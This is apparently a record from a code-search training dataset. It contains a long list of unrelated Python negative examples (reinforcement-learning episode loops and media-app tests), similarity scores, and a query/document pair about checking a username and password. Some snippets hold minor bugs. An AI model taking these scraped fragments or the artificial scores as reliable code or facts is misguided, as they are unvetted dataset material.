self.trajectories.append(trajectory)\n self.send_explorer.send(trajectory)\n\n self._post_processes()\n self.ag_stats.explore_time_in_epi = time() - _start2\n else:\n pass\n\n self.clear_trajectories()\n return self.ag_stats.get()", "def stopEpisode(self):\n if self.episodesSoFar < self.numTraining:\n self.accumTrainRewards += self.episodeRewards\n else:\n self.accumTestRewards += self.episodeRewards\n self.episodesSoFar += 1\n if self.episodesSoFar >= self.numTraining:\n # Take off the training wheels\n self.epsilon = 0.0 # no exploration\n self.alpha = 0.0 # no learning\n\n print(\"Agent Stop Episode\")\n print(self.episodeRewards)\n for feature, weight in self.weights.iteritems():\n print(\"\\t\" + str(feature) + \" - \" + str(weight))\n self.episodeRewardsList.append(self.episodeRewards)", "def play(self):\n pass", "def run_episode(env, agent, deterministic, do_training=True, rendering=False, max_timesteps=1000):\n\n stats = EpisodeStats() # save statistics like episode reward or action usage\n state = env.reset()\n\n step = 0\n while True:\n\n action_id = agent.act(state=state, deterministic=deterministic)\n next_state, reward, terminal, info = env.step(action_id)\n\n if do_training:\n agent.train(state, action_id, next_state, reward, terminal)\n\n state = next_state\n\n # # NOTE reward shaping...\n # if terminal:\n # reward += -1\n # if step < 20:\n # reward += -10\n # if step > 100:\n # reward += 10\n\n stats.step(reward, action_id)\n\n if rendering:\n env.render()\n\n if terminal or step > max_timesteps:\n break\n\n step += 1\n\n return stats", "def test_atomic_update_episode(self):\n episode = self._create_sample_episode()\n study_id, session_id, episode_id = (episode.study_id, episode.session_id,\n episode.id)\n\n def callback(read_episode):\n # Read episode should match the stored one.\n self.assertEqual(read_episode, episode)\n self.assertEqual(read_episode.num_steps, 100)\n # Make a change.\n read_episode.num_steps = 200\n return True\n\n self.assertTrue(\n self.storage.atomic_update_episode(study_id, session_id, episode_id,\n callback))\n # Check that the change was applied.\n episode.num_steps = 200\n self.assertEqual(\n self.storage.get_episode(study_id, session_id, episode_id), episode)", "def train(self, max_episodes= 1000, eps_start=1.0, eps_end=0.01, 
eps_decay=0.995):\n success = False\n i_episode = 0\n eps = eps_start\n \n print('Training in progress...')\n for i in range(max_episodes):\n score = self.run_training_episode(eps=eps)\n \n self.score_window.append(score)\n self.score_record.append(np.mean(self.score_window))\n \n i_episode += 1\n eps = max(eps_end, eps_decay*eps) # decrease epsilon\n\n if i_episode%100 == 0:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, self.score_record[-1]))\n \n if i_episode>100:\n if np.mean(self.score_window)>self.criteria:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, self.score_record[-1]))\n success = True\n break\n\n if success:\n print('Criteria reached after {} episodes'.format(i_episode))\n else:\n print('Failed to reach Criteria after {} episodes'.format(i_episode))\n\n self.plot_training_progress()\n return success", "def run_episode(env, agent, deterministic, skip_frames=0, do_training=True, rendering=True, max_timesteps=10000,\n history_length=0, manual=False):\n\n stats = utils.EpisodeStats()\n\n # Save history\n image_hist = []\n\n step = 0\n state = env.reset()\n\n env.viewer.window.on_key_press = utils.key_press\n env.viewer.window.on_key_release = utils.key_release\n # fix bug of corrupted states without rendering in gym environment\n env.viewer.window.dispatch_events()\n\n # append image history to first state\n state = state_preprocessing(state)\n image_hist.extend([state] * (history_length + 1))\n state = np.array(image_hist).reshape(96, 96, history_length + 1)\n while True:\n #skip intro zoom frames\n if step < 48:\n step += 1\n env.step(utils.id_to_action(0))\n continue\n \n # TODO: get action_id from agent\n # Hint: adapt the probabilities of the 5 actions for random sampling so that the agent explores properly.\n if do_training and manual:\n action_id = utils.manual_action\n else:\n action_id = agent.act(state, deterministic)\n action = utils.id_to_action(action_id)\n\n # Hint: frame skipping might help you to get better results.\n reward = 0\n for _ in range(skip_frames + 1):\n next_state, r, terminal, info = env.step(action)\n reward += r\n\n if rendering:\n env.render()\n\n if terminal:\n break\n\n next_state = state_preprocessing(next_state)\n \n image_hist.append(next_state)\n image_hist.pop(0)\n next_state = np.array(image_hist).reshape(96, 96, history_length + 1)\n\n if do_training and (next_state[:82, :, -1].sum() > 5000): #track out of sight\n print('Track gone; finish this episode')\n agent.add(state, action_id, next_state, reward=-(skip_frames + 1), terminal=True) #punish\n break\n\n if do_training:\n agent.add(state, action_id, next_state, reward, terminal)\n if not manual:\n agent.train()\n\n stats.step(reward, action_id)\n\n state = next_state\n \n if terminal or (step * (skip_frames + 1)) > max_timesteps:\n break\n\n step += 1\n\n return stats", "def test_search_torrent(self):\n episode = self._get_episode()\n search_results = self.fetcher.jackett.search(episode.indexed_name)\n best_result = self.fetcher.best_search_result(search_results)\n self.assertEqual(best_result.get(\"id\"), 2)", "def test_search_torrent(self):\n episode = self._get_episode()\n search_results = self.fetcher.jackett.search(episode.indexed_name)\n best_result = self.fetcher.best_search_result(search_results)\n self.assertEqual(best_result.get(\"id\"), 2)", "def run_episode(env, gamma = 1.0, render = False):\n actions = 4\n obs = env.reset()\n total_reward = 0\n step_idx = 0\n\n while True:\n if render:\n env.render()\n obs, reward, done , _ = 
env.step(random.randint(0, actions - 1))\n x1, x2, x3, x4, x5, x6, x7, x8 = obs\n x1s.append(x1)\n x2s.append(x2)\n x3s.append(x3)\n x4s.append(x4)\n x5s.append(x5)\n x6s.append(x6)\n x7s.append(x7)\n x8s.append(x8)\n total_reward += (gamma ** step_idx * reward)\n step_idx += 1\n if done:\n break\n return total_reward, step_idx", "def _run_single(self, thread_id, agent, environment, deterministic=False,\n max_episode_timesteps=-1, episode_finished=None, testing=False, sleep=None):\n\n # figure out whether we are using the deprecated way of \"episode_finished\" reporting\n old_episode_finished = False\n if episode_finished is not None and len(getargspec(episode_finished).args) == 1:\n old_episode_finished = True\n\n episode = 0\n # Run this single worker (episode loop) as long as global count thresholds have not been reached.\n while not self.should_stop:\n state = environment.reset()\n agent.reset()\n self.global_timestep, self.global_episode = agent.timestep, agent.episode\n episode_reward = 0\n\n # Time step (within episode) loop\n time_step = 0\n time_start = time.time()\n while True:\n action, internals, states = agent.act(states=state, deterministic=deterministic, buffered=False)\n reward = 0\n for repeat in xrange(self.repeat_actions):\n state, terminal, step_reward = environment.execute(action=action)\n reward += step_reward\n if terminal:\n break\n\n if not testing:\n # agent.observe(reward=reward, terminal=terminal)\n # Insert everything at once.\n agent.atomic_observe(\n states=state,\n actions=action,\n internals=internals,\n reward=reward,\n terminal=terminal\n )\n\n if sleep is not None:\n time.sleep(sleep)\n\n time_step += 1\n episode_reward += reward\n\n if terminal or time_step == max_episode_timesteps:\n break\n\n # Abort the episode (discard its results) when global says so.\n if self.should_stop:\n return\n\n self.global_timestep += time_step\n\n # Avoid race condition where order in episode_rewards won't match order in episode_timesteps.\n self.episode_list_lock.acquire()\n self.episode_rewards.append(episode_reward)\n self.episode_timesteps.append(time_step)\n self.episode_times.append(time.time() - time_start)\n self.episode_list_lock.release()\n\n if episode_finished is not None:\n # old way of calling episode_finished\n if old_episode_finished:\n summary_data = {\n \"thread_id\": thread_id,\n \"episode\": episode,\n \"timestep\": time_step,\n \"episode_reward\": episode_reward\n }\n if not episode_finished(summary_data):\n return\n # New way with BasicRunner (self) and thread-id.\n elif not episode_finished(self, thread_id):\n return\n\n episode += 1", "def send_music_play_event_and_validate(self):\n play_detection_timeout = 1\n if self.dut.is_streaming():\n self.logger.info('Music already streaming. 
Skipping play event..')\n return\n self.logger.info('Playing video...')\n is_played = self.dut.music_control_events(\n AVRCPSTATUS, self.dut.apollo_log_regex.AVRCP_PLAY_REGEX)\n if not is_played:\n self.logger.error('AVRCP Played status not found')\n raise TestActsError('AVRCP Played status not found.')\n wait_until(\n lambda: self.dut.is_streaming(),\n play_detection_timeout,\n sleep_s=0.25)\n if not self.dut.is_streaming():\n self.logger.error('Device is NOT in a deviceA2DPStreaming state')\n raise TestActsError(\n 'Device is NOT in a deviceA2DPStreaming state.')", "def play_one_episode(self, func, stat='score'):\n if not isinstance(stat, list):\n stat = [stat]\n while True:\n s = self.current_state()\n act = func(s)\n act, r, isOver = self.action(act)\n # print r\n if isOver:\n s = [self.stats[k] for k in stat]\n self.reset_stat()\n return s if len(s) > 1 else s[0]", "def test_atomic_update_episode_no_update(self):\n episode = self._create_sample_episode()\n study_id, session_id, episode_id = (episode.study_id, episode.session_id,\n episode.id)\n\n def callback(read_episode):\n # Make a change but return false.\n read_episode.num_steps = 200\n return False\n\n self.assertFalse(\n self.storage.atomic_update_episode(study_id, session_id, episode_id,\n callback))\n self.assertEqual(\n self.storage.get_episode(study_id, session_id, episode_id), episode)", "def on_train_begin(self, logs):\n print(f\"Testing for {self.params['nb_episodes']} episodes ...\")", "def begin_episode(self, observation):\n self._reset_state()\n self._record_observation(observation)\n\n if not self.eval_mode:\n self._train_step()\n\n self._rng, self.action = select_action(self.network_def,\n self.online_params,\n self.state,\n self._rng,\n self.num_actions,\n self.eval_mode,\n self.epsilon_eval,\n self.epsilon_train,\n self.epsilon_decay_period,\n self.training_steps,\n self.min_replay_history,\n self.epsilon_fn)\n self.action = onp.asarray(self.action)\n return self.action", "def begin_episode(self, observation):\n self._reset_state()\n self._record_observation(observation)\n\n if not self.eval_mode:\n self._train_step()\n\n self._rng, self.action = select_action(self.network_def,\n self.online_params,\n self.state,\n self._rng,\n self.num_quantile_samples,\n self.num_actions,\n self.eval_mode,\n self.epsilon_eval,\n self.epsilon_train,\n self.epsilon_decay_period,\n self.training_steps,\n self.min_replay_history,\n self.epsilon_fn,\n self._tau,\n self.optimizer)\n self.action = onp.asarray(self.action)\n return self.action", "def run(agent, env, num_episodes = 20000, mode = 'train'):\n\t scores=[]\n\t max_avg_score=-np.inf\n\t for i_episode in range(1, num_episodes + 1):\n\t # Initialize episode\n\t state=env.reset()\n\t action=agent.reset_episode(state)\n\t total_reward=0\n\t done=False\n\n\t # Roll out steps until done\n\t while not done:\n\t state, reward, done, info=env.step(action)\n\t total_reward += reward\n\t action=agent.act(state, reward, done, mode)\n\n\t # Save final score\n\t scores.append(total_reward)\n\n\t # Print episode stats\n\t if mode == 'train':\n\t if len(scores) > 100:\n\t avg_score=np.mean(scores[-100:])\n\t if avg_score > max_avg_score:\n\t max_avg_score=avg_score\n\n\t if i_episode % 100 == 0:\n\t print(\"\\rEpisode {}/{} | Max Average Score: {}\".format(i_episode,\n\t num_episodes, max_avg_score), end = \"\")\n\t sys.stdout.flush()\n\n\t return scores\n\n\tscores=run(q_agent, env)\n\n\t# Plot scores obtained per episode\n\tplt.plot(scores); plt.title(\"Scores\")\n\n\tdef 
plot_scores(scores, rolling_window = 100):\n\t\t\"\"\"Plot scores and optional rolling mean using specified window.\"\"\"\n\t\tplt.plot(scores); plt.title(\"Scores\");\n\t\trolling_mean=pd.Series(scores).rolling(rolling_window).mean()\n\t\tplt.plot(rolling_mean);\n\t\treturn rolling_mean\n\n\trolling_mean=plot_scores(scores)\n\n\t# Run in test mode and analyze socres obtained\n\ttest_scores=run(q_agent, env, num_episodes = 100, mode = 'test')\n\tprint(\"[TEST] Completed {} episodes with avg. score = {}\".format(\n\t len(test_scores), np.mean(test_scores)))\n\t_=plot_scores(test_scores, rolling_window = 10)\n\n\n\tdef plot_q_table(q_table):\n \"\"\"Visualize max Q-value for each state and corresponding action.\"\"\"\n\t q_image=np.max(q_table, axis = 2) # max Q-value for each state\n\t q_actions=np.argmax(q_table, axis = 2) # best action for each state\n\n\t fig, ax=plt.subplots(figsize = (10, 10))\n\t cax=ax.imshow(q_image, cmap = 'jet');\n\t cbar=fig.colorbar(cax)\n\t for x in range(q_image.shape[0]):\n\t for y in range(q_image.shape[1]):\n\t ax.text(x, y, q_actions[x, y], color = 'white',\n\t horizontalalignment = 'center', verticalalignment = 'center')\n\t ax.grid(False)\n\t ax.set_title(\"Q-table, size: {}\".format(q_table.shape))\n\t ax.set_xlabel('position')\n\t ax.set_ylabel('velocity')\n\n\n\tplot_q_table(q_agent.q_table)\n\n\n\tstate_grid_new=create_uniform_grid(\n\t env.observation_space.low, env.observation_space.high, bins = (20, 20))\n\tq_agent_new=QLearningAgent(env, state_grid_new)\n\tq_agent_new.scores=[]\n\n\n\tq_agent_new.scores += run(q_agent_new, env,\n\t num_episodes = 50000) # accumulate scores\n\trolling_mean_new=plot_scores(q_agent_new.scores)\n\n\ttest_scores= run(q_agent_new, env, num_episodes = 100, mode = 'test')\n\tprint(\"[TEST] Completed {} episodes with avg. 
score = {}\".format(\n\t len(test_scores), np.mean(test_scores)))\n\t_=plot_scores(test_scores)\n\n\tplot_q_table(q_agent_new.q_table)\n\n\tstate=env.reset()\n\tscore=0\n\timg=plt.imshow(env.render(mode='rgb_array'))\n\tfor t in range(1000):\n\t\taction=q_agent_new.act(state, mode = 'test')\n\t\timg.set_data(env.render(mode='rgb_array'))\n\t\tplt.axis('off')\n\t\tdisplay.display(plt.gcf())\n\t\tdisplay.clear_output(wait = True)\n\t\tstate, reward, done, _=env.step(action)\n\t\tsocre += reward\n\t\tif done:\n\t\t\tprint('Score: ', socre)\n\t\t\tbreak\n\tenv.close()", "def begin_episode(self, observation: np.ndarray, a: int) -> int:\n del observation\n del a\n return -1", "def test_start(self):\n magic_hat = Game()\n result = Game.start(magic_hat)\n self.assertEqual(result, game.STATUS_PLAYING)", "def test_atomic_update_missing_episode(self):\n\n def callback(unused_episode):\n # Callback should not be called.\n assert False\n\n self.assertFalse(\n self.storage.atomic_update_episode('study', 'session', 'missing',\n callback))", "def execute_and_get_episodes(self, num_episodes, max_timesteps_per_episode=0, deterministic=False):\n pass", "def run_episode(self, environment):\n state = environment.reset()\n self.steps_done = 0\n while True:\n state_tensor = FloatTensor([state])\n position = self.Q.sample_from_softmax_policy(state_tensor)\n action = position + 1\n next_state, reward, done, _ = environment.step(position.item())\n self.memory.push((state_tensor, action,))\n self.learn(state_tensor, action, next_state, reward)\n state = next_state\n self.steps_done += 1\n if done:\n break\n history = environment.close()\n return history", "def test_delete_episode(self):\n episode = self._create_sample_episode()\n study_id, session_id, episode_id = (episode.study_id, episode.session_id,\n episode.id)\n self.assertIsNotNone(\n self.storage.get_episode(study_id, session_id, episode_id))\n\n self.assertTrue(\n self.storage.delete_episode(episode.study_id, episode.session_id,\n episode.id))\n self.assertIsNone(\n self.storage.get_episode(study_id, session_id, episode_id))", "def podcast_show(url, name):\n for recording in scraper.get_podcast_episodes(url):\n INTERFACE.add_item(recording['title'],\n 'play_podcast',\n recording['url'],\n extra_info=recording)", "def test_save_repeat_unwatched_episodes_should_not_be(self):\n episode = self.schedule.episodes[0]\n all_episodes = self.schedule.episodes\n followed_show = FollowedShows.objects.get(user=self.user, show_id=episode.show.id)\n UnwatchedEpisode(\n followed_show=followed_show,\n episode_id=episode.id,\n episode_name=episode.name,\n season=episode.season,\n episode_number=episode.number or 0,\n air_date=episode.airdate,\n air_time=episode.airtime,\n air_stamp=episode.airstamp,\n summary=episode.summary or \"no summary\"\n ).save()\n save_episodes(self.schedule.episodes)\n # make sure all episodes are saved to both users unwatched episodes despite the integrity error in bulk_create\n self.assertEqual(len(all_episodes) * 2, len(UnwatchedEpisode.objects.all()))", "def execute_episodes(self, num_episodes, max_timesteps_per_episode=0, update_spec=None, deterministic=False):\n pass", "def _update_episode(self):\n if self.episode_num > 0:\n self._publish_reward_topic(\n self.accumulated_episode_reward,\n self.episode_steps,\n self.episode_num\n )\n\n self.episode_num += 1\n self.accumulated_episode_reward = 0\n self.episode_steps = 0", "def _create_sample_episode(self) -> study_pb2.Episode:\n study_id, session_id = self.init_session()\n episode = 
sample_episode(study_id=study_id, session_id=session_id)\n self.storage.create_episode(episode)\n return episode", "def run(self):\n # Observe the game by randomly sampling actions from the environment\n # and performing those actions\n self.__observe__()\n for i in xrange(self.num_epochs):\n self.environment.resetStatistics()\n time_now = time.time()\n for j in xrange(self.train_steps_per_epoch):\n # Get action using epsilon-greedy strategy\n action = self.__sample_epsilon_action__()\n # Perform action based on epsilon-greedy search and store the transitions\n # in experience replay\n self.__supply_action_to_environment__(action)\n # If the environment is in the terminal state, reset the environment, and\n # perform self.stack_num actions to reset the environment\n self.isGameOver()\n if j % self.train_frequency == 0:\n # print \"Started training\"\n # Sample minibatch of size self.minibatch_size from experience replay\n minibatch = self.experience_replay.sample()\n minibatch_states, minibatch_action, minibatch_reward, minibatch_next_states, \\\n minibatch_terminals = minibatch\n cost = self.network.train_network(minibatch_states,\n minibatch_action,\n minibatch_reward,\n minibatch_terminals,\n minibatch_next_states)\n if j % self.record_frequency == 0:\n total_score, num_games = self.environment.getStatistics()\n avg_score = total_score / num_games\n self.network.record_average_qvalue(\n self.experience_replay.getCurrentState(),\n i * self.train_steps_per_epoch + j,\n self.epsilon, avg_score)\n # Epsilon annealing\n self.__anneal_epsilon__()\n # if self.time_step % 1000 == 0:\n # print \"Cost at iteration\", self.time_step, \" is\", cost\n # print \"Value of epsilon is\", self.epsilon\n self.steps += 1\n if j % self.copy_steps == 0:\n self.network.copy_weights()\n total_score, num_games = self.environment.getStatistics()\n time_taken = (time.time() - time_now)\n logger.info(\"Finished epoch %d: Steps=%d; Time taken=%.2f\",\n i, j, time_taken)\n logger.info(\"\\tNumber of games: %d; Average reward: %.2f\", num_games, (total_score / num_games))\n logger.info(\"\\tFinal epsilon value for epoch: %f\", self.epsilon)\n self.network.create_checkpoint()", "def trainOneEpisode(self, num_episodes, max_episode_steps=100, save_freq=100, render=False):\n # tqdm.write('------Episode {} / {}------'.format(self.episodes_done, num_episodes))\n self.resetEnv()\n r_total = 0\n with trange(1, max_episode_steps+1, leave=False) as t:\n\n for step in t:\n if render:\n self.env.render()\n state = self.state\n action, q = self.selectAction(state, require_q=True)\n obs_, r, done, info = self.takeAction(action.item())\n # if print_step:\n # print 'step {}, action: {}, q: {}, reward: {} done: {}' \\\n # .format(step, action.item(), q, r, done)\n r_total += r\n # t.set_postfix(step='{:>5}'.format(step), q='{:>5}'.format(round(q, 4)), total_reward='{:>5}'.format(r_total))\n t.set_postfix_str('step={:>5}, q={:>5}, total_reward={:>5}'.format(step, round(q, 2), r_total))\n if done or step == max_episode_steps:\n next_state = None\n else:\n next_state = self.getNextState(obs_)\n reward = torch.tensor([r], device=self.device, dtype=torch.float)\n self.memory.push(state, action, next_state, reward)\n self.optimizeModel()\n if self.steps_done % self.target_update == 0:\n self.target_net.load_state_dict(self.policy_net.state_dict())\n\n if done or step == max_episode_steps - 1:\n tqdm.write('------Episode {} ended, total reward: {}, step: {}------' \\\n .format(self.episodes_done, r_total, step))\n tqdm.write('------Total 
steps done: {}, current e: {} ------' \\\n .format(self.steps_done, self.exploration.value(self.steps_done)))\n # print '------Episode {} ended, total reward: {}, step: {}------' \\\n # .format(self.episodes_done, r_total, step)\n # print '------Total steps done: {}, current e: {} ------' \\\n # .format(self.steps_done, self.exploration.value(self.steps_done))\n self.episodes_done += 1\n self.episode_rewards.append(r_total)\n self.episode_lengths.append(step)\n if self.episodes_done % save_freq == 0:\n self.saveCheckpoint()\n break\n self.state = next_state", "async def discover(loop, artwork=False, hosts=None):\n if hosts:\n discovered = await pyatv.scan(loop, hosts=hosts, timeout=5)\n else:\n discovered = await pyatv.scan(loop, timeout=5)\n atvs = []\n\n for device in discovered:\n atv = {}\n atv['playing'] = False\n\n atv['name'] = device.name\n atv['address'] = device.address\n atv['identifier'] = device.identifier\n atv['device_type'] = 'apple-tv'\n\n for service in device.services:\n if service.protocol.name == 'MRP':\n try:\n connect_device = await pyatv.connect(device, loop)\n now_playing = await connect_device.metadata.playing()\n # 'album', 'artist', 'device_state', 'genre', 'hash', 'media_type', 'position', 'repeat', 'shuffle', 'title', 'total_time'\n if 'idle' not in str(now_playing.device_state).lower():\n atv['now_playing'] = now_playing.title\n atv['playing'] = True\n\n if 'paused' in str(now_playing.device_state).lower():\n atv['playing'] = 'Paused'\n\n if now_playing.total_time:\n atv['playing_percent'] = (now_playing.position / now_playing.total_time) * 100\n\n atv['current_position'] = now_playing.position\n atv['time_remaining'] = now_playing.total_time - now_playing.position\n atv['total_time'] = now_playing.total_time\n \n # print('current: ' + str(now_playing.position))\n # print('total: ' + str(now_playing.total_time))\n # print(str(atv['playing_percent']))\n elif now_playing.position and not now_playing.total_time:\n atv['playing_percent'] = 200\n\n ## TO DO Artwork\n # if artwork:\n # artwork = await connect_device.metadata.artwork()\n # print(artwork)\n\n finally:\n await connect_device.close()\n atvs.append(atv)\n\n return atvs", "def play_episode(env, policy, render_option, min_steps):\n state = env.reset()\n done = False\n episode_reward = 0.0\n step_cnt = 0\n while not done or step_cnt < min_steps:\n if render_option == 'collect':\n env.render()\n action = policy(state)\n next_state, reward, done, _ = env.step(action)\n episode_reward += reward\n state = next_state\n step_cnt += 1\n print('episode finished with reward {0}'.format(episode_reward))\n return episode_reward", "def play(self):\r\n self.perform_strategy()", "def test_songs_played(self):\n self.assertEqual(self.show.song_booleans, {\n 'you-enjoy-myself': 1,\n 'tweezer': 0\n })", "def test(config, alg, checkpoint=None, testdelay=0, render=False, envcreator=None, maxepisodelen=10000000):\n if alg == \"random\":\n env = envcreator()\n else:\n agent = get_agent_class(alg)(config=config, env=\"retro-v0\")\n if checkpoint is None:\n raise ValueError(f\"A previously trained checkpoint must be provided for algorithm {alg}\")\n agent.restore(checkpoint)\n env = agent.local_evaluator.env\n\n while True:\n state = env.reset()\n done = False\n reward_total = 0.0\n step = 0\n while not done and step < maxepisodelen:\n if alg == \"random\":\n action = np.random.choice(range(env.action_space.n))\n else:\n action = agent.compute_action(state)\n next_state, reward, done, _ = env.step(action)\n 
time.sleep(testdelay)\n reward_total += reward\n if render:\n env.render()\n state = next_state\n step = step + 1\n print(\"Episode reward\", reward_total)", "def test_play(self):\n self.assertTrue(len(self.player.valid_callers)>0)\n \"\"\"...and should allow round_robin.play to call\"\"\"\n self.assertTrue(\"play\" in self.player.valid_callers)\n self.play()\n self.play()", "def play(self, n_episodes=100, max_episode_length=3000, load_path=\"last_save.h5\"):\n\n self.explore = False # Explore if needed\n\n self._play_through(n_episodes=n_episodes, max_episode_length=max_episode_length, load_path=load_path,\n callbacks=self._play_callbacks_factory())", "def on_episode_start(self, agent, **kwargs):\n self.episode_start[agent.brain.episode] = timeit.default_timer()\n self.observations[agent.brain.episode] = []\n self.rewards[agent.brain.episode] = []\n self.actions[agent.brain.episode] = []\n self.metrics[agent.brain.episode] = {}", "def track_03():\n sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen', force_radio=True)\n return \"Ok\"", "def test_runGame(self):\n # this is tested by playing the game. No good way to unit test this.\n pass", "def run_aqi(self):\r\n while True:\r\n self.get_aqi()\r\n time.sleep(30 - time.time() % 30)", "def media_episode(self):\n media_status = self._media_status()[0]\n return media_status.episode if media_status else None", "def evaluate(self, env, num_episodes, max_episode_length=None\n , show_detail = False):\n episode_counter = 1;\n average_reward = 0;\n average_episode_length = 0;\n time_this, ob_this, is_terminal = env.reset()\n\n ob_this = self._preprocessor.process_observation(time_this, ob_this)\n\n obs_this_net = self._preprocessor.process_observation_for_network(\n ob_this, self._min_array, self._max_array)\n\n state_this_net = np.append(obs_this_net[0:13], obs_this_net[14:]).reshape(1,16)\n setpoint_this = ob_this[6:8]\n \n this_ep_reward = 0;\n this_ep_length = 0;\n while episode_counter <= num_episodes:\n action_mem = self.select_action(state_this_net, stage = 'testing');\n # covert command to setpoint action \n action = self._policy.process_action(setpoint_this, action_mem)\n\n time_next, ob_next, is_terminal = env.step(action)\n \n ob_next = self._preprocessor.process_observation(time_next, ob_next)\n\n setpoint_next = ob_next[6:8]\n\n obs_next_net = self._preprocessor.process_observation_for_network(\n ob_next, self._min_array, self._max_array)\n \n state_next_net = np.append(obs_next_net[0:13], obs_next_net[14:]).reshape(1,16)\n \n #10:PMV, 11: Occupant number , -2: power\n reward = self._preprocessor.process_reward(obs_next_net[12:15])\n \n this_ep_reward += reward;\n \n #Check if exceed the max_episode_length\n if max_episode_length is not None and \\\n this_ep_length >= max_episode_length:\n is_terminal = True;\n #Check whether to start a new episode\n if is_terminal:\n time_this, ob_this, is_terminal = env.reset()\n ob_this = self._preprocessor.process_observation(time_this, ob_this)\n setpoint_this = ob_this[6:8]\n obs_this_net = self._preprocessor.process_observation_for_network(\n ob_this, self._min_array, self._max_array)\n\n state_this_net = np.append(obs_this_net[0:13], \n obs_this_net[14:]).reshape(1,16)\n\n average_reward = (average_reward * (episode_counter - 1) \n + this_ep_reward) / episode_counter;\n average_episode_length = (average_episode_length \n * (episode_counter - 1) \n + this_ep_length) / episode_counter;\n \n episode_counter += 1;\n if show_detail:\n logging.info ('Episode ends. 
Cumulative reward is %0.04f '\n 'episode length is %d, average reward by now is %0.04f,'\n ' average episode length by now is %d.' %(this_ep_reward,\n this_ep_length,\n average_reward,\n average_episode_length));\n this_ep_length = 0;\n this_ep_reward = 0;\n \n else:\n ob_this = ob_next\n setpoint_this = setpoint_next\n state_this_net = state_next_net\n time_this = time_next\n this_ep_length += 1;\n return (average_reward, average_episode_length);", "def executeEpisode(self, mcts, game, args):\n trainExamples = []\n board = game.getInitBoard()\n curPlayer = 1\n episodeStep = 0\n state_counter = Counter()\n\n moves = 0\n\n while True:\n episodeStep += 1\n canonicalBoard = game.getCanonicalForm(board, curPlayer)\n temp = int(episodeStep < self.args['tempThreshold'])\n\n pi = mcts.getActionProb(canonicalBoard, temp=temp)\n sym = game.getSymmetries(canonicalBoard, pi)\n for b, p in sym:\n trainExamples.append([b, curPlayer, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n state_counter.update(game.stringRepresentation(board)) #count the visit to the board\n\n board, curPlayer = game.getNextState(board, curPlayer, action)\n\n r = game.getGameEnded(board, curPlayer)\n \n moves += 1\n\n if moves >= self.args['maxMoves']:\n r = 1e-4\n\n if r != 0:\n return ([(x[0], x[2], r * ((-1) ** (x[1] != curPlayer))) for x in trainExamples], state_counter)", "def run(self):\n self.ae.start()", "def test(net, env, total_episodes, test_seeds=None, cuda=False, log=False, render=False, max_actions=10000):\n net.eval()\n total_reward = 0\n with torch.no_grad():\n for ep in range(total_episodes):\n obs = env.reset()\n done, ep_reward, ep_actions = False, 0, []\n hx = Variable(net.init_hidden())\n all_obs = [obs]\n action_count = 0\n while not done:\n if render:\n env.render()\n obs = Variable(torch.Tensor(obs)).unsqueeze(0)\n if cuda:\n obs, hx = obs.cuda(), hx.cuda()\n critic, logit, hx = net((obs, hx))\n prob = F.softmax(logit, dim=1)\n action = int(prob.max(1)[1].data.cpu().numpy())\n obs, reward, done, _ = env.step(action)\n action_count += 1\n done = done if action_count <= max_actions else True\n ep_actions.append(action)\n # A quick hack to prevent the agent from stucking\n max_same_action = 5000\n if action_count > max_same_action:\n actions_to_consider = ep_actions[-max_same_action:]\n if actions_to_consider.count(actions_to_consider[0]) == max_same_action:\n done = True\n ep_reward += reward\n if not done:\n all_obs.append(obs)\n total_reward += ep_reward\n if log:\n logger.info('Episode =>{} Score=> {} Actions=> {} ActionCount=> {}'.format(ep, ep_reward, ep_actions,\n action_count))\n return total_reward / total_episodes", "def main():\n global repeat\n regime = collect()\n start = int(raw_input(\"Which line of the exercise script would you like to begin with? \")) - 1\n regime = regime[start:]\n say(\"Ready?\")\n time.sleep(1)\n for exercise in regime:\n coach(exercise[:-1])\n while repeat:\n repeat = False\n coach(exercise[:-1])\n say(\"Session complete.\")", "def testOneShow(self):\n\t\t# for line in self.file:\n\t\t# \tprint line\n\t\tline = self.file.readline()\n\t\tinfo = scrapeFilename( line )\n\t\tassert info['show'] == \"Chuck\"" ]
[ "0.6574454", "0.64675266", "0.6428111", "0.6335772", "0.6264014", "0.6199133", "0.6197816", "0.6196485", "0.6193701", "0.6170308", "0.6169579", "0.61569935", "0.61476463", "0.60803", "0.6072124", "0.60470563", "0.6037859", "0.6029739", "0.60170627", "0.60096955", "0.59748065", "0.59707355", "0.5963511", "0.59322083", "0.59228396", "0.5851858", "0.58473396", "0.5810563", "0.57973063", "0.578185", "0.57710165", "0.57710165", "0.5756667", "0.5745298", "0.5743211", "0.57393086", "0.5732825", "0.5720216", "0.5720091", "0.5709835", "0.5686379", "0.5680427", "0.56635785", "0.5652328", "0.5649652", "0.5646747", "0.5639988", "0.5622973", "0.56028414", "0.56004894", "0.55840844", "0.55737025", "0.55662376", "0.5563632", "0.55522877", "0.5519451", "0.5503489", "0.5495842", "0.54956967", "0.549453", "0.549453", "0.54773414", "0.54767877", "0.54634607", "0.545317", "0.5449681", "0.54422206", "0.5441044", "0.54401726", "0.5436172", "0.5429962", "0.54276985", "0.54268545", "0.5407996", "0.53915906", "0.5387836", "0.5382639", "0.5381958", "0.5375536", "0.53732413", "0.53729206", "0.5360793", "0.53601396", "0.5357626", "0.5356289", "0.534783", "0.53447163", "0.53445154", "0.53328073", "0.5324535", "0.53142214", "0.5312247", "0.5303467", "0.53029424", "0.5299989", "0.5298545", "0.5298279", "0.52856714", "0.5283042", "0.5282711", "0.52821326" ]
0.0
-1
This function is called to check if a username / password combination is valid.
def check_auth(username, password): return (username == app.config['USERNAME'] and password == app.config['PASSWORD'])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
